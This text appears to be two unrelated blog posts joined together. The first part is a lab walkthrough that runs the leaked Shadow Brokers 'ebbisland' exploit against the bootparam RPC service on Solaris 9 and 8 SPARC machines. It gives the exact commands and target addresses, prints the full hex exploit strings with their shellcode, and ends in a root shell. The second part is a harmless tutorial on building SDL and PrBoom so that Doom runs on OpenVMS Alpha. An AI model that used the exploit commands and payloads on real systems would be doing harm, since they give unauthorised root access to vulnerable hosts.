user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ rpcinfo -p 10.0.2.10
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100232 10 udp 32772
100083 1 tcp 32771
100221 1 tcp 32772
100229 1 tcp 32773
100229 2 tcp 32773
100230 1 tcp 32774
100242 1 tcp 32775
100422 1 tcp 32776
100068 2 udp 32773
100068 3 udp 32773
100068 4 udp 32773
100068 5 udp 32773
100011 1 udp 32774 rquotad
100001 2 udp 32775 rstatd
100001 3 udp 32775 rstatd
100001 4 udp 32775 rstatd
100002 2 udp 32776 rusersd
100002 3 udp 32776 rusersd
100002 2 tcp 32777 rusersd
100002 3 tcp 32777 rusersd
100008 1 udp 32777 walld
100012 1 udp 32778 sprayd
100024 1 udp 32779 status
100024 1 tcp 32778 status
100133 1 udp 32779
100133 1 tcp 32778
100021 1 udp 4045 nlockmgr
100021 2 udp 4045 nlockmgr
100021 3 udp 4045 nlockmgr
100021 4 udp 4045 nlockmgr
100021 1 tcp 4045 nlockmgr
100021 2 tcp 4045 nlockmgr
100021 3 tcp 4045 nlockmgr
100021 4 tcp 4045 nlockmgr
300598 1 udp 32785
300598 1 tcp 32782
805306368 1 udp 32785
805306368 1 tcp 32782
100249 1 udp 32786
100249 1 tcp 32783
1289637086 5 tcp 32784
1289637086 1 tcp 32784
100026 1 udp 32806 bootparam
100026 1 tcp 32848 bootparam

We can see from the above the vulnerable TCP ports 32806 and 32848   so we can execute ebbisland as follows

user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ ./ebbisland -t 10.0.2.10 -p 32848 -r 100026 -X -N -A 0x6e908

The exploit takes a couple of seconds to complete and is quite reliable

user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ ./ebbisland -t 10.0.2.10 -p 32848 -r 100026 -X -N -A 0x6e908
./ebbisland version 1.0.0.0

************************************
**** WARNING - non - inetd mode ****
************************************

auth len 192
lz addr: 0x6e9f4, codeAddr: 0x6e94c jumpOffset: 0x1c
landing zone size: 1024
Address range covered: 0x6e70c -> 0x6eb08

Ok to continue? y
Exploit string:
80 00 04 e8 73 d5 72 cb 00 00 00 00 00 00 00 02 ....s.r.........
00 01 86 ba 00 00 00 00 00 00 00 00 00 00 55 de ..............U.
00 00 00 c0 5c 74 67 c3 00 00 00 09 31 32 37 2e ....\tg.....127.
30 2e 30 2e 31 00 00 00 00 00 00 00 00 00 00 00 0.0.1...........
00 00 00 28 82 10 20 06 90 10 20 02 91 d0 20 08 ...(.. ... ... .
90 10 20 01 91 d0 20 08 91 d0 20 08 82 10 20 1b .. ... ... ... .
91 d0 20 08 b0 10 24 00 82 10 20 29 90 10 00 18 .. ...$... )....
91 d0 20 08 2a bf ff fd b0 a6 20 01 91 d0 20 08 .. .*..... ... .
91 d0 20 08 11 0b d8 98 90 02 29 6e 13 0b dc d8 .. .......)n....
92 02 68 00 d0 3b bf e0 90 23 a0 20 92 23 a0 18 ..h..;...#. .#..
96 23 a0 1b d6 22 40 00 c0 22 60 04 82 10 20 0b .#..."@.."`... .
91 d0 20 08 90 1a 00 08 82 10 20 01 91 d0 20 08 .. ....... ... .
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 06 eb dc ................
00 00 00 00 00 00 00 00 00 00 00 00 00 06 eb 4c ...............L
00 06 eb 48 00 06 eb 44 00 06 eb 40 00 06 eb 3c ...H...D...@...<
00 06 eb 38 00 06 eb 34 00 06 eb 30 00 06 eb 2c ...8...4...0...,
00 06 eb 28 00 06 eb 24 00 06 eb 20 00 06 eb 1c ...(...$... ....
00 06 eb 18 00 06 eb 14 00 06 eb 10 00 06 eb 0c ................
00 06 eb 08 00 06 eb 04 00 06 eb 00 00 06 ea fc ................
00 06 ea f8 00 06 ea f4 00 06 ea f0 00 06 ea ec ................
00 06 ea e8 00 06 ea e4 00 06 ea e0 00 06 ea dc ................
00 06 ea d8 00 06 ea d4 00 06 ea d0 00 06 ea cc ................
00 06 ea c8 00 06 ea c4 00 06 ea c0 00 06 ea bc ................
00 06 ea b8 00 06 ea b4 00 06 ea b0 00 06 ea ac ................
00 06 ea a8 00 06 ea a4 00 06 ea a0 00 06 ea 9c ................
00 06 ea 98 00 06 ea 94 00 06 ea 90 00 06 ea 8c ................
00 06 ea 88 00 06 ea 84 00 06 ea 80 00 06 ea 7c ...............|
00 06 ea 78 00 06 ea 74 00 06 ea 70 00 06 ea 6c ...x...t...p...l
00 06 ea 68 00 06 ea 64 00 06 ea 60 00 06 ea 5c ...h...d...`...\
00 06 ea 58 00 06 ea 54 00 06 ea 50 00 06 ea 4c ...X...T...P...L
00 06 ea 48 00 06 ea 44 00 06 ea 40 00 06 ea 3c ...H...D...@...<
00 06 ea 38 00 06 ea 34 00 06 ea 30 00 06 ea 2c ...8...4...0...,
00 06 ea 28 00 06 ea 24 00 06 ea 20 00 06 ea 1c ...(...$... ....
00 06 ea 18 00 06 ea 14 00 06 ea 10 00 06 ea 0c ................
00 06 ea 08 00 06 ea 04 00 06 ea 00 00 06 e9 fc ................
00 06 e9 f8 00 06 e9 f4 00 06 e9 f0 00 06 e9 ec ................
00 06 e9 e8 00 06 e9 e4 00 06 e9 e0 00 06 e9 dc ................
00 06 e9 d8 00 06 e9 d4 00 06 e9 d0 00 06 e9 cc ................
00 06 e9 c8 00 06 e9 c4 00 06 e9 c0 00 06 e9 bc ................
00 06 e9 b8 00 06 e9 b4 00 06 e9 b0 00 06 e9 ac ................
00 06 e9 a8 00 06 e9 a4 00 06 e9 a0 00 06 e9 9c ................
00 06 e9 98 00 06 e9 94 00 06 e9 90 00 06 e9 8c ................
00 06 e9 88 00 06 e9 84 00 06 e9 80 00 06 e9 7c ...............|
00 06 e9 78 00 06 e9 74 00 06 e9 70 00 06 e9 6c ...x...t...p...l
00 06 e9 68 00 06 e9 64 00 06 e9 60 00 06 e9 5c ...h...d...`...\
00 06 e9 58 00 06 e9 54 00 06 e9 50 00 06 e9 4c ...X...T...P...L
00 06 e9 48 00 06 e9 44 00 06 e9 40 00 06 e9 3c ...H...D...@...<
00 06 e9 38 00 06 e9 34 00 06 e9 30 00 06 e9 2c ...8...4...0...,
00 06 e9 28 00 06 e9 24 00 06 e9 20 00 06 e9 1c ...(...$... ....
00 06 e9 18 00 06 e9 14 00 06 e9 10 00 06 e9 0c ................
00 06 e9 08 00 06 e9 04 00 06 e9 00 00 06 e8 fc ................
00 06 e8 f8 00 06 e8 f4 00 06 e8 f0 00 06 e8 ec ................
00 06 e8 e8 00 06 e8 e4 00 06 e8 e0 00 06 e8 dc ................
00 06 e8 d8 00 06 e8 d4 00 06 e8 d0 00 06 e8 cc ................
00 06 e8 c8 00 06 e8 c4 00 06 e8 c0 00 06 e8 bc ................
00 06 e8 b8 00 06 e8 b4 00 06 e8 b0 00 06 e8 ac ................
00 06 e8 a8 00 06 e8 a4 00 06 e8 a0 00 06 e8 9c ................
00 06 e8 98 00 06 e8 94 00 06 e8 90 00 06 e8 8c ................
00 06 e8 88 00 06 e8 84 00 06 e8 80 00 06 e8 7c ...............|
00 06 e8 78 00 06 e8 74 00 06 e8 70 00 06 e8 6c ...x...t...p...l
00 06 e8 68 00 06 e8 64 00 06 e8 60 00 06 e8 5c ...h...d...`...\
00 06 e8 58 00 06 e8 54 00 06 e8 50 00 06 e8 4c ...X...T...P...L
00 06 e8 48 00 06 e8 44 00 06 e8 40 00 06 e8 3c ...H...D...@...<
00 06 e8 38 00 06 e8 34 00 06 e8 30 00 06 e8 2c ...8...4...0...,
00 06 e8 28 00 06 e8 24 00 06 e8 20 00 06 e8 1c ...(...$... ....
00 06 e8 18 00 06 e8 14 00 06 e8 10 00 06 e8 0c ................
00 06 e8 08 00 06 e8 04 00 06 e8 00 00 06 e7 fc ................
00 06 e7 f8 00 06 e7 f4 00 06 e7 f0 00 06 e7 ec ................
00 06 e7 e8 00 06 e7 e4 00 06 e7 e0 00 06 e7 dc ................
00 06 e7 d8 00 06 e7 d4 00 06 e7 d0 00 06 e7 cc ................
00 06 e7 c8 00 06 e7 c4 00 06 e7 c0 00 06 e7 bc ................
00 06 e7 b8 00 06 e7 b4 00 06 e7 b0 00 06 e7 ac ................
00 06 e7 a8 00 06 e7 a4 00 06 e7 a0 00 06 e7 9c ................
00 06 e7 98 00 06 e7 94 00 06 e7 90 00 06 e7 8c ................
00 06 e7 88 00 06 e7 84 00 06 e7 80 00 06 e7 7c ...............|
00 06 e7 78 00 06 e7 74 00 06 e7 70 00 06 e7 6c ...x...t...p...l
00 06 e7 68 00 06 e7 64 00 06 e7 60 00 06 e7 5c ...h...d...`...\
00 06 e7 58 00 06 e7 54 00 06 e7 50 ...X...T...P
Timed out waiting for RPC response
id
uid=0(root) gid=1(other)
pwd
/usr/sbin
uname -a
SunOS solaris9 5.9 Generic_118558-34 sun4m sparc SUNW,SPARCstation-5

Similar approach was tested against Solaris 5.8 (sparc) except the address was different

Querying the remote rpc service

user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ rpcinfo -p 10.0.2.10 | grep bootparam
100026 1 udp 32806 bootparam
100026 1 tcp 32854 bootparam

user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ ./ebbisland -t 10.0.2.10 -p 32854 -r 100026 -X -N -A 0x7c760
./ebbisland version 1.0.0.0

************************************
**** WARNING - non - inetd mode ****
************************************

auth len 192
lz addr: 0x7c84c, codeAddr: 0x7c7a4 jumpOffset: 0x1c
landing zone size: 1024
Address range covered: 0x7c564 -> 0x7c960

Ok to continue? y
Exploit string:
80 00 04 e8 71 6e f1 5f 00 00 00 00 00 00 00 02 ....qn._........
00 01 86 ba 00 00 00 00 00 00 00 00 00 00 55 de ..............U.
00 00 00 c0 5c 74 72 d2 00 00 00 09 31 32 37 2e ....\tr.....127.
30 2e 30 2e 31 00 00 00 00 00 00 00 00 00 00 00 0.0.1...........
00 00 00 28 82 10 20 06 90 10 20 02 91 d0 20 08 ...(.. ... ... .
90 10 20 01 91 d0 20 08 91 d0 20 08 82 10 20 1b .. ... ... ... .
91 d0 20 08 b0 10 24 00 82 10 20 29 90 10 00 18 .. ...$... )....
91 d0 20 08 2a bf ff fd b0 a6 20 01 91 d0 20 08 .. .*..... ... .
91 d0 20 08 11 0b d8 98 90 02 29 6e 13 0b dc d8 .. .......)n....
92 02 68 00 d0 3b bf e0 90 23 a0 20 92 23 a0 18 ..h..;...#. .#..
96 23 a0 1b d6 22 40 00 c0 22 60 04 82 10 20 0b .#..."@.."`... .
91 d0 20 08 90 1a 00 08 82 10 20 01 91 d0 20 08 .. ....... ... .
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 07 ca 34 ...............4
00 00 00 00 00 00 00 00 00 00 00 00 00 07 c9 a4 ................
00 07 c9 a0 00 07 c9 9c 00 07 c9 98 00 07 c9 94 ................
00 07 c9 90 00 07 c9 8c 00 07 c9 88 00 07 c9 84 ................
00 07 c9 80 00 07 c9 7c 00 07 c9 78 00 07 c9 74 .......|...x...t
00 07 c9 70 00 07 c9 6c 00 07 c9 68 00 07 c9 64 ...p...l...h...d
00 07 c9 60 00 07 c9 5c 00 07 c9 58 00 07 c9 54 ...`...\...X...T
00 07 c9 50 00 07 c9 4c 00 07 c9 48 00 07 c9 44 ...P...L...H...D
00 07 c9 40 00 07 c9 3c 00 07 c9 38 00 07 c9 34 ...@...<...8...4
00 07 c9 30 00 07 c9 2c 00 07 c9 28 00 07 c9 24 ...0...,...(...$
00 07 c9 20 00 07 c9 1c 00 07 c9 18 00 07 c9 14 ... ............
00 07 c9 10 00 07 c9 0c 00 07 c9 08 00 07 c9 04 ................
00 07 c9 00 00 07 c8 fc 00 07 c8 f8 00 07 c8 f4 ................
00 07 c8 f0 00 07 c8 ec 00 07 c8 e8 00 07 c8 e4 ................
00 07 c8 e0 00 07 c8 dc 00 07 c8 d8 00 07 c8 d4 ................
00 07 c8 d0 00 07 c8 cc 00 07 c8 c8 00 07 c8 c4 ................
00 07 c8 c0 00 07 c8 bc 00 07 c8 b8 00 07 c8 b4 ................
00 07 c8 b0 00 07 c8 ac 00 07 c8 a8 00 07 c8 a4 ................
00 07 c8 a0 00 07 c8 9c 00 07 c8 98 00 07 c8 94 ................
00 07 c8 90 00 07 c8 8c 00 07 c8 88 00 07 c8 84 ................
00 07 c8 80 00 07 c8 7c 00 07 c8 78 00 07 c8 74 .......|...x...t
00 07 c8 70 00 07 c8 6c 00 07 c8 68 00 07 c8 64 ...p...l...h...d
00 07 c8 60 00 07 c8 5c 00 07 c8 58 00 07 c8 54 ...`...\...X...T
00 07 c8 50 00 07 c8 4c 00 07 c8 48 00 07 c8 44 ...P...L...H...D
00 07 c8 40 00 07 c8 3c 00 07 c8 38 00 07 c8 34 ...@...<...8...4
00 07 c8 30 00 07 c8 2c 00 07 c8 28 00 07 c8 24 ...0...,...(...$
00 07 c8 20 00 07 c8 1c 00 07 c8 18 00 07 c8 14 ... ............
00 07 c8 10 00 07 c8 0c 00 07 c8 08 00 07 c8 04 ................
00 07 c8 00 00 07 c7 fc 00 07 c7 f8 00 07 c7 f4 ................
00 07 c7 f0 00 07 c7 ec 00 07 c7 e8 00 07 c7 e4 ................
00 07 c7 e0 00 07 c7 dc 00 07 c7 d8 00 07 c7 d4 ................
00 07 c7 d0 00 07 c7 cc 00 07 c7 c8 00 07 c7 c4 ................
00 07 c7 c0 00 07 c7 bc 00 07 c7 b8 00 07 c7 b4 ................
00 07 c7 b0 00 07 c7 ac 00 07 c7 a8 00 07 c7 a4 ................
00 07 c7 a0 00 07 c7 9c 00 07 c7 98 00 07 c7 94 ................
00 07 c7 90 00 07 c7 8c 00 07 c7 88 00 07 c7 84 ................
00 07 c7 80 00 07 c7 7c 00 07 c7 78 00 07 c7 74 .......|...x...t
00 07 c7 70 00 07 c7 6c 00 07 c7 68 00 07 c7 64 ...p...l...h...d
00 07 c7 60 00 07 c7 5c 00 07 c7 58 00 07 c7 54 ...`...\...X...T
00 07 c7 50 00 07 c7 4c 00 07 c7 48 00 07 c7 44 ...P...L...H...D
00 07 c7 40 00 07 c7 3c 00 07 c7 38 00 07 c7 34 ...@...<...8...4
00 07 c7 30 00 07 c7 2c 00 07 c7 28 00 07 c7 24 ...0...,...(...$
00 07 c7 20 00 07 c7 1c 00 07 c7 18 00 07 c7 14 ... ............
00 07 c7 10 00 07 c7 0c 00 07 c7 08 00 07 c7 04 ................
00 07 c7 00 00 07 c6 fc 00 07 c6 f8 00 07 c6 f4 ................
00 07 c6 f0 00 07 c6 ec 00 07 c6 e8 00 07 c6 e4 ................
00 07 c6 e0 00 07 c6 dc 00 07 c6 d8 00 07 c6 d4 ................
00 07 c6 d0 00 07 c6 cc 00 07 c6 c8 00 07 c6 c4 ................
00 07 c6 c0 00 07 c6 bc 00 07 c6 b8 00 07 c6 b4 ................
00 07 c6 b0 00 07 c6 ac 00 07 c6 a8 00 07 c6 a4 ................
00 07 c6 a0 00 07 c6 9c 00 07 c6 98 00 07 c6 94 ................
00 07 c6 90 00 07 c6 8c 00 07 c6 88 00 07 c6 84 ................
00 07 c6 80 00 07 c6 7c 00 07 c6 78 00 07 c6 74 .......|...x...t
00 07 c6 70 00 07 c6 6c 00 07 c6 68 00 07 c6 64 ...p...l...h...d
00 07 c6 60 00 07 c6 5c 00 07 c6 58 00 07 c6 54 ...`...\...X...T
00 07 c6 50 00 07 c6 4c 00 07 c6 48 00 07 c6 44 ...P...L...H...D
00 07 c6 40 00 07 c6 3c 00 07 c6 38 00 07 c6 34 ...@...<...8...4
00 07 c6 30 00 07 c6 2c 00 07 c6 28 00 07 c6 24 ...0...,...(...$
00 07 c6 20 00 07 c6 1c 00 07 c6 18 00 07 c6 14 ... ............
00 07 c6 10 00 07 c6 0c 00 07 c6 08 00 07 c6 04 ................
00 07 c6 00 00 07 c5 fc 00 07 c5 f8 00 07 c5 f4 ................
00 07 c5 f0 00 07 c5 ec 00 07 c5 e8 00 07 c5 e4 ................
00 07 c5 e0 00 07 c5 dc 00 07 c5 d8 00 07 c5 d4 ................
00 07 c5 d0 00 07 c5 cc 00 07 c5 c8 00 07 c5 c4 ................
00 07 c5 c0 00 07 c5 bc 00 07 c5 b8 00 07 c5 b4 ................
00 07 c5 b0 00 07 c5 ac 00 07 c5 a8 ............
Timed out waiting for RPC response
id
uid=0(root) gid=1(other)
uname -a
SunOS solaris8 5.8 Generic_108528-13 sun4m sparc SUNW,SPARCstation-5

The parameters were taken from the original ebbisland help file located here

https://fdik.org/EQGRP/Linux/etc/opscript.txt

Video demonstration of the above

This was something I have wanted to do in a while and could not find courage and time to do so. Who would not want to play the most legendary game from ID-Soft ever made  ?

!!! We will do so on the OpenVMS system !!!!

First of all I would like to mention that most of the porting of the SDL as well as the PrBoom code was done by Alexey Chupahin who’s original site is no longer accessible ( was located here http://fafner.dyndns.org/%7Ealexey/libsdl/public.html ) Unfortunately only  incomplete snapshots exist on archive.org from which we cannot download the needed OpenVMS configure.com files and the source code for the particular versions

Luckily almost complete archive for the needed source files as well as the VMS patches can be found here http://nchrem.tnw.tudelft.nl/openvms/software2.html#SDL

I have downloaded all the needed files so that it would be easier for us to compile and build the needed libraries in order to play Doom on OpenVMS, this is divided into multiple steps which we will go through.

All the files below are available from my archive here : http://45.76.81.249/OpenVMS/Alpha/

Pre-requizites 

– OpenVMS Alpha C and C++ compilers (Im using HP C V7.3-009 on OpenVMS Alpha V8.4   and HP C++ V7.3-009 for OpenVMS Alpha V8.4) and the corresponding licenses for these (you can get the hobbyist one as I have described it here ( https://astr0baby.wordpress.com/2017/10/22/setting-up-dw-motif-on-openvms-8-4-2-alphavm-linux64/)  As well as a fully working TCPIP environment and the DW-MOTIF X11 environment.   I am no going to cover the C and CXX installation procedure here.

Step 1. Building MMK

We first need to build an OpenVMS MMK  (Make) utility in order to work with the SDL and PRBOOM configure.com scripts

We can download the ZIP archive from here http://45.76.81.249/OpenVMS/Alpha/mmk.zip

The mmk.zip needs to be uploaded to the OpenVMS environment via FTP or SCP (I use FTP)   and lets create a remote OpenVMS Build directory infrastructure. In order to make things simple I’m running my simulation under SYSTEM account and create the following structure on my primary disk

SYS$SYSROOT:[SYSMGR.BUILD.MMK]   <– which will hold the mmk.zip (make sure to use bin format when uploading binary files)

230 User logged in.
Remote system type is VMS.
ftp> bin
200 TYPE set to IMAGE.
ftp> pwd
257 "SYS$SYSROOT:[SYSMGR.BUILD]" is current directory.
ftp> mkdir MMK
257 "SYS$SYSROOT:[SYSMGR.BUILD.MMK]" directory created.
ftp> cd MMK
250-CWD command successful.
250 New default directory is SYS$SYSROOT:[SYSMGR.BUILD.MMK]
ftp> put mmk.zip
local: mmk.zip remote: mmk.zip
200 PORT command successful.
150 Opening data connection for SYS$COMMON:[SYSMGR.BUILD.MMK]mmk.zip;1 (10.0.2.2,48665)
226 Transfer complete.
451343 bytes sent in 0.07 secs (6.5853 MB/s)
ftp>

We will also need to upload UNZIP.EXE from here http://45.76.81.249/OpenVMS/Alpha/unzip.exe and place it in the SYS$SYSROOT:[SYSMGR.BUILD.MMK] directory to extract the mmk.zip as well as VMSTAR.EXE from here http://45.76.81.249/OpenVMS/Alpha/vmstar.exe

ftp> pwd
257 "SYS$SYSROOT:[SYSMGR.BUILD]" is current directory.
ftp> mkdi MMK
257 "SYS$SYSROOT:[SYSMGR.BUILD.MMK]" directory created.
ftp> cd MMK
250-CWD command successful.
250 New default directory is SYS$SYSROOT:[SYSMGR.BUILD.MMK]
ftp> put mmk.zip
local: mmk.zip remote: mmk.zip
200 PORT command successful.
150 Opening data connection for SYS$COMMON:[SYSMGR.BUILD.MMK]mmk.zip;1 (10.0.2.2,44533)
226 Transfer complete.
451343 bytes sent in 0.05 secs (9.3386 MB/s)
ftp>


230 User logged in.
Remote system type is VMS.
ftp> bin
200 TYPE set to IMAGE.
ftp> cd BUILD
250-CWD command successful.
250 New default directory is SYS$SYSROOT:[SYSMGR.BUILD]
ftp> put vmstar.exe
local: vmstar.exe remote: vmstar.exe
200 PORT command successful.
150 Opening data connection for SYS$SYSROOT:[SYSMGR.BUILD]vmstar.exe;2 (10.0.2.2,57935)
226 Transfer complete.
42496 bytes sent in 0.00 secs (519.5814 MB/s)
ftp>

Now we can extract the mmk.zip and build it. This is done simply by defining the UNZIP.EXE path and running it against the ZIP archive

$ unzip :== $SYS$SYSROOT:[SYSMGR.BUILD.MMK]unzip.exe
$ unzip mmk.zip 
Archive: SYS$SYSROOT:[SYSMGR.BUILD.MMK]mmk.zip;1
<---cut--->
inflating: [.source]tpadef.h 
$

Next we run the @link.com script to build MMK

$ @link.com
$ LINK/EXEC=MMK.EXE/NOTRACE MMK.Alpha_OPT/OPT
COLLECT=CLUSTER1,$$$COPYRIGHT
BIN_DIR:MMK.OLB/INCLUDE=(MMK,DEFAULT_RULES)/LIB
$ dir *.exe

Directory SYS$SYSROOT:[SYSMGR.BUILD.MMK]

MMK.EXE;1 unzip.exe;1

We will now define the MMK.EXE path for the next builds since it is needed for the SDL and PrBoom configure.com scripts

$ mmk :== $SYS$SYSROOT:[SYSMGR.BUILD.MMK]mmk.exe

Step 2. Building SDL-1.2.14

Now we can return back to the core build directory and upload SDL

$ set def SYS$SYSROOT:[SYSMGR.BUILD]

SDL-1.2.14 can be downloaded from here

http://45.76.81.249/OpenVMS/Alpha/SDL-1_2_14.ZIP 

and the OpenVMS SDL-1_2_14-PATCH here

http://45.76.81.249/OpenVMS/Alpha/SDL-1_2_14-VMSPATCH.TAR

We extract the SDL-1_2_14.ZIP and the SDL-1_2_14-VMSPATCH.TAR archives , patch the sources and build the libraries.

$ unzip sdl-1_2_14.zip
$ vmstar :== $SYS$SYSROOT:[SYSMGR.BUILD]vmstar.exe
$ vmstar -xvf sdl-1_2_14-vmspatch.tar
$ set def SYS$SYSROOT:[SYSMGR.BUILD.sdl-1_2_14]

$ @configure.com
 
Configuring LIBSDL library
(c) Alexey Chupahin
alexey@vaxman.de
Rostov-on-Don, Russia
 
Checking architecture 	...  Alpha
Compiler		...  DEC C
Checking build utility	...  MMK
 
Checking for getenv ...   Yes
Checking for nanosleep ...   Yes
Checking for snprintf ...   Yes
Checking for vsnprintf ...   Yes
Checking for stdint.h ...   No
Checking for X11 ...   Yes
Checking for OpenVMS Multimedia  ...   No
OpenGL library support ...   No
*******************************************
Now type
@BUILD
$ 
$ @BUILD 

<-- cut -->  AFTER SOME TIME <-- cut --> 

COPY sdl$shr.exe SYS$SHARE:
 
***************************************************************************** 
LIBSDL$STARTUP.COM has been created. 
This file setups all logicals needed. It should be execute before using LibSDL 
Nice place to call it - LOGIN.COM 
Usage:
CC/INC=SDL TEST
LINK/THREAD=UP TEST,LIBSDL:LIBSDL$SHR/OPT
or
LINK/THREAD=UP TEST,LIBSDL:LIBSDL/OPT
for static libSDL
***************************************************************************** 

So now we are ready to define the SDL libraries for the next build of SDL-Mixer, which we will do simply by executing the LIBSDL$STARTUP.COM  script

$ @LIBSDL$STARTUP.COM

Step 3. Building SDL-mixer1.2.8b

We change back to the BUILD directory and upload and extract the SDL-Mixer source and Patches. You can get the SDL-Mixer source here

http://45.76.81.249/OpenVMS/Alpha/SDL_mixer-1.2.8b.zip

and the OpenVMS patches here

http://45.76.81.249/OpenVMS/Alpha/SDL_MIXER-1_2_8b-VMSPATCH.zip

We upload them via FTP to the SYS$SYSROOT:[SYSMGR.BUILD]   and extract/patch and compile it

$ set def SYS$SYSROOT:[SYSMGR.BUILD]
$ unzip SDL_MIXER-1_2_8b.zip
$ unzip SDL_MIXER-1_2_8b-VMSPATCH.zip
$ set DEF SYS$SYSROOT:[SYSMGR.BUILD.sdl_mixer-1_2_8b]
$ @configure.com
 
Configuring SDL_Mixer library
(c) Alexey Chupahin aka CHAPG
 
Checking architecture   ...  Alpha
Checking OS             ...  OpenVMS V8.4    
Compiler		...  DEC C
Checking build utility	...  MMK
 
checking version libSDL  : 1.2.14
Checking for correct libSDL  ...   Yes
generating LIBSDL_MIXER$SHR.OPT
generating LIBSDL_MIXER.OPT
generating LIBSDL_MIXER$DEF.OPT
 
 
Now you can type @BUILD 
$ @build.com

<---- CUT   AFTER SOME TIME  CUT -----> 
***************************************************************************** 
LIBSDL_MIXER$STARTUP.COM has been created. 
This file setups all logicals needed. It should be execute before using 
Nice place to call it - LOGIN.COM 
***************************************************************************** 
Important! You are using shared library of libSDL. To compile a project with lib
SDL_MIXER you should: 
CC/INCL=(SDL,LIBSDL_MIXER) PROJECT.C
LINK/THREAD=UP  PROJECT,LIBSDL_MIXER:LIBSDL_MIXER$SHR/OPT,LIBSDL:LIBSDL$SHR/OPT

$ @LIBSDL_MIXER$STARTUP.COM 
%DCL-E-OPENIN, error opening SYS$SYSROOT:[SYSMGR.BUILD.SDL_MIXER-1_2_8B]LIBSDL_M
IXER$STARTUP.COM; as input
-RMS-E-FLK, file currently locked by another user

Now if  we get the above message that the file currently locked by another user we just need to relogin and re-define all the variables in the system (Im welcome for any suggestions on how to bypass this)

$ logout
SYSTEM logged out at 7-MAR-2019 23:55:10.78

Welcome to OpenVMS (TM) Alpha Operating System, Version V8.4

$ set def SYS$SYSROOT:[SYSMGR.BUILD.SDL-1_2_14]
$ @LIBSDL$STARTUP.COM
$ set def SYS$SYSROOT:[SYSMGR.BUILD.SDL_MIXER-1_2_8b]
$ @LIBSDL_MIXER$STARTUP.COM
$ set def SYS$SYSROOT:[SYSMGR.BUILD]              
$ vmstar :== $SYS$SYSROOT:[SYSMGR.BUILD]vmstar.exe
$ unzip :== $SYS$SYSROOT:[SYSMGR.BUILD]unzip.exe
$ mmk :== $SYS$SYSROOT:[SYSMGR.BUILD.MMK]mmk.exe

Step 4.Building PrBoom-2.5.0

Once we have finished building SDL-Mixer we can move on to PrBoom source compilation ! We are almost there. I have modified the configure.com OpenVMS patch for PrBoom to build on my emulated OpenVMS 8.4 Alpha without the need for zlib and libpng libraries since the original patch from here (http://nchrem.tnw.tudelft.nl/openvms/software2.html) required them, but they are not essential

Lets first get the sources and the patches for PrBoom 2.5.0 here

http://45.76.81.249/OpenVMS/Alpha/prboom-2_5_0.tar

and original and my customized VMS patches here

http://45.76.81.249/OpenVMS/Alpha/prboom-2_5_0_vmspatch.zip

http://45.76.81.249/OpenVMS/Alpha/CONFIGURE.COM IMPORTANT TO USE THIS CONFIGURE.COM !!!!!!

We upload them via FTP to the SYS$SYSROOT:[SYSMGR.BUILD]   and extract and patch the source code and as a final step replace with the above CONFIGURE.COM in SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0]

$ set def SYS$SYSROOT:[SYSMGR.BUILD]
$ vmstar -xvf prboom-2_5_0.tar
$ unzip prboom-2_5_0_vmspatch.zip
Archive: SYS$SYSROOT:[SYSMGR.BUILD]prboom-2_5_0_vmspatch.zip;1
inflating: [.prboom-2_5_0]configure.com 
replace [.prboom-2_5_0.src]m_fixed.h? [y]es, [n]o, [A]ll, [N]one, [r]ename: A
$ copy CONFIGURE.COM SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0] 
$ set def SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0]
$ @CONFIGURE.COM;2 
 
Configuring PRBOOM
(c) Alexey Chupahin (aka CHAPG) 
 
Checking architecture   ...  Alpha
Checking OS             ...  OpenVMS V8.4    
Compiler		...  DEC C
Checking build utility	...  MMK
 
checking version libSDL  : 1.2.14
Checking for correct libSDL  ...   Yes
Checking for TCPIP ...   Yes
checking version LIBSDL_MIXER  : 1.2.8
Checking for correct LIBSDL_MIXER ...   Yes
Checking for vsnprintf ...   Yes
Generating CONFIG.H
Generating DESCRIP.MMS
Generating BUILD.COM 
 
 
Now you can type @BUILD 
$ set def SYS$SYSROOT:[SYSMGR.BUILD.PRBOOM-2_5_0]
$ @BUILD 

<--- CUT AFTER SOME TIME CUT ---> 

LINK/EXE=DOOM.EXE [.SDL]I_MAIN,[]DOOM/LIB,libsdl:libsdl$shr/opt,libsdl_mixer:lib
sdl_mixer/opt
%LINK-W-WRNERS, compilation warnings
in module i_main file SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0.src.SDL]I_M
AIN.OBJ;1
%LINK-W-WRNERS, compilation warnings
in module g_game file SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0.src]DOOM.OL
B;1
%LINK-W-WRNERS, compilation warnings
in module i_video file SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0.src]DOOM.O
LB;1
%LINK-W-WRNERS, compilation warnings
in module m_misc file SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0.src]DOOM.OL
B;1
%LINK-W-WRNERS, compilation warnings
in module v_video file SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0.src]DOOM.O
LB;1
%LINK-W-WRNERS, compilation warnings
in module w_mmap file SYS$SYSROOT:[SYSMGR.BUILD.prboom-2_5_0.src]DOOM.OL
B;1
$!
$ 

Make sure to copy the prboom.wad into the DOOM.EXE path as well as the DOOM.WAD of our choice

Doom1.wad can be downloaded from here

http://45.76.81.249/OpenVMS/Alpha/DOOM.WAD

And the configuration file (disables mouse movement) here

https://45.76.81.249/OpenVMS/Alpha/prboom.cfg

$ set def SYS$SYSROOT:[SYSMGR.BUILD.PRBOOM-2_5_0.data]
$ copy prboom.wad SYS$SYSROOT:[SYSMGR.BUILD.PRBOOM-2_5_0]
$ set def SYS$SYSROOT:[SYSMGR.BUILD.PRBOOM-2_5_0.src]
